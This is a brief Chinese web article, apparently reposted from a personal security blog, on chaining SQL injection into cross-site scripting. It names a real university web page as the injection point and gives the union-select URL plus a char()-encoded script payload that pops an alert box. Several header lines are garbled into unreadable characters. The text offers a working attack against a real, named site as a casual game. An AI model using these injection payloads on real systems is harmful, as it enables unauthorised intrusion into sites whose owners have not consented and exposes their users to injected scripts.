利用的SQL注入来玩玩跨站XSS
2009-06-12 16:55:04 来源:WEB开发网 闁靛棴鎷�
闁告垵绻愰惃顒傗偓娑欍仦缂嶏拷
濠⒀呭仜閵囧洨鈧稒銇炵紞锟�闁靛棴鎷� 闁稿繗娅曢弫鐐次涘▎鎰泚闁告娲ㄥ▓鎴濐嚗椤旂厧瑙�
核心提示:secure-hiphop的Blog 先将自己要弹出的东西编码一下 随便找的注入点例如 www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2-- 我们就在1的位置填入转码后的代码 可爱的弹跳窗就出来了 www.lob.polytechnique.fr/t
secure-hiphop的Blog
先将自己要弹出的东西编码一下
随便找的注入点例如
www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2--
我们就在1的位置填入转码后的代码
可爱的弹跳窗就出来了
www.lob.polytechnique.fr/themes.php?id=1-1+union+select+char(34, 62, 60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),2--
中查找“利用的SQL注入来玩玩跨站XSS”更多相关内容
中查找“利用的SQL注入来玩玩跨站XSS”更多相关内容更多精彩
赞助商链接
